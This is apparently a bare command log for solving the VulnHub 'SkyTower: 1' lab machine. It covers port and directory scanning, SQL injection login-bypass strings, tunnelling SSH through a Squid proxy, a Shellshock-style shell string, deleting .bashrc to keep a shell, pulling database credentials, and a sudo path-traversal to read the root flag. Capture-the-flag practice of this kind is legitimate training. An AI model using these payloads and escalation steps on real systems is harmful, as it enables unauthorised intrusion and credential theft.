VulnHub: SkyTower: 1

nmap -sn 10.0.2.27/24
nmap -Pn 10.0.2.40
nmap -Pn -p1000- 10.0.2.40
nmap -A -p22,80,3128 10.0.2.40
nmap --script vuln -p22,80,3128 10.0.2.40
ssh 10.0.2.40
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.40/ -x php,txt,html,sh,cgi,bak -q
test@test.com
test
1' or 1=1--
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 
1' || 1=1--
1' || 1=1-- - -> failed
1' || 1=1--+ -> failed
1' || 1=1# -> succeeded
proxytunnel -p <target ip>:<proxy port> -d 127.0.0.1:<target port> -a <our port>
proxytunnel -p 10.0.2.40:3128 -d 127.0.0.1:22 -a 1234
ssh john@127.0.0.1 -p 1234
ssh john@127.0.0.1 -p 1234 '() { :;}; /bin/bash'
ssh john@127.0.0.1 -p 1234 /bin/bash
id
python -c 'import pty;pty.spawn("/bin/bash");'
which echo
echo os.system('/bin/bash')
ls -la
nano .bashrc
cat .bashrc
rm .bashrc
ssh john@127.0.0.1 -p 1234
cat /etc/passwd
/opt
/tmp
/var
/var/backups
/var/log
/var/mail
/var/www/html
cd /var/www/html
ls -la
cat login.php
sudo -l
mysql -V
mysql -uroot -proot
use mysql;show databases;
use SkyTech;show tables;
select * from login
su sara
ssh sara@127.0.0.1 -p 1234 /bin/bash
rm .bashrc
ssh sara@127.0.0.1 -p 1234
sudo -l
ls -la /
sudo /bin/cat /accounts/../root/flag.txt
su -
password: theskytower
